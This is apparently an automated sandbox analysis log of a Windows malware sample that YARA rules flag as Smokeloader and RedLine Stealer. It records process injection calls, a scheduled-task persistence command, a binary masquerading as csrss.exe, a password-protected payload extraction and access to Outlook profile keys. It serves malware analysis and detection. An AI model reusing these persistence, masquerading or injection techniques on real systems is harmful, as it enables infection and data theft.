Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: awj6swcrr.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: awj6swcrr.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: asacpiex.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: csunsapi.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: swift.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: nfhwcrhk.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: surewarehook.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: csunsapi.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: aep.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: atasi.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: swift.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: nfhwcrhk.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: nuronssl.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: surewarehook.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: ubsec.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: aep.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: atasi.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: swift.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: nfhwcrhk.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: nuronssl.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: surewarehook.dll
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Section loaded: ubsec.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\32.exe 36FC0432ECBBBA57C6A04B2D0A1F2E37FC25D292CD16E8F3A1CB9D2FA810AF04
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\38B4.exe DDF5992A22E591CAE17174A449440242CA2D202F54C075595E3C2424A37A89BC

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.2104229521.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2105121877.0000000002BA0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.2424970399.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000019.00000002.2450588768.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.2285416255.000000000288F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.2425309073.0000000002C70000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\41CD.exe

Code function: String function: 00145BC0 appears 50 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015BC
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401590
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004015CB
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040159B
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004015B0
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_02A50110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	11_2_02A50110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_0467657B NtCreateThreadEx,	13_2_0467657B
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_00401459 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	17_2_00401459
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_00401464 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	17_2_00401464
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	17_2_00401476
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_00403208 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,	17_2_00403208
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_0040320A NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,	17_2_0040320A
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_00403233 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,	17_2_00403233
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_004031E8 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,	17_2_004031E8
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_004021E9 NtQuerySystemInformation,	17_2_004021E9
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Code function: 17_2_00401487 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	17_2_00401487

Source: file.exe, 00000000.00000002.1805488002.0000000002AA0000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameMungler> vs file.exe

Source: 50E3.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 57C9.dll.1.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT size: 0xd0 address: 0x0

Source: 4A1B.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9992833857913669
Source: 4A1B.exe.1.dr	Static PE information: Section: ZLIB complexity 1.0007621951219512
Source: 57C9.dll.1.dr	Static PE information: Section: CRT ZLIB complexity 0.995068359375
Source: 57C9.dll.1.dr	Static PE information: Section: .crt ZLIB complexity 0.9976538873487903

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vahvrsu

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@47/38@2900/43

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: file.exe

Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vahvrsu C:\Users\user\AppData\Roaming\vahvrsu
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\38B4.exe C:\Users\user\AppData\Local\Temp\38B4.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\41CD.exe C:\Users\user\AppData\Local\Temp\41CD.exe
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4A1B.exe C:\Users\user\AppData\Local\Temp\4A1B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\50E3.exe C:\Users\user\AppData\Local\Temp\50E3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\57C9.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\57C9.dll
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process created: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\user\AppData\Local\Temp\"
Source: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process created: C:\Users\user\AppData\Local\Temp\50E3.exe C:\Users\user\AppData\Local\Temp\50E3.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8042.exe C:\Users\user\AppData\Local\Temp\8042.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vahvrsu C:\Users\user\AppData\Roaming\vahvrsu
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tdhvrsu C:\Users\user\AppData\Roaming\tdhvrsu
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\38B4.exe C:\Users\user\AppData\Local\Temp\38B4.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\41CD.exe C:\Users\user\AppData\Local\Temp\41CD.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4A1B.exe C:\Users\user\AppData\Local\Temp\4A1B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\50E3.exe C:\Users\user\AppData\Local\Temp\50E3.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\57C9.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8042.exe C:\Users\user\AppData\Local\Temp\8042.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process created: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\user\AppData\Local\Temp\"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Process created: C:\Users\user\AppData\Local\Temp\50E3.exe C:\Users\user\AppData\Local\Temp\50E3.exe
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\57C9.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\38B4.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\38B4.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02C685B9 CreateToolhelp32Snapshot,Module32First,

0_2_02C685B9

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Mutant created: \Sessions\1\BaseNamedObjects\QPRZ3bWvXh

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: OProcSessIdGPUCache.pdb source: AppLaunch.exe, 00000009.00000002.2398878448.000000000BA50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: 4A1B.exe, 0000000A.00000002.2389137053.0000000001525000.00000004.00000020.00020000.00000000.sdmp
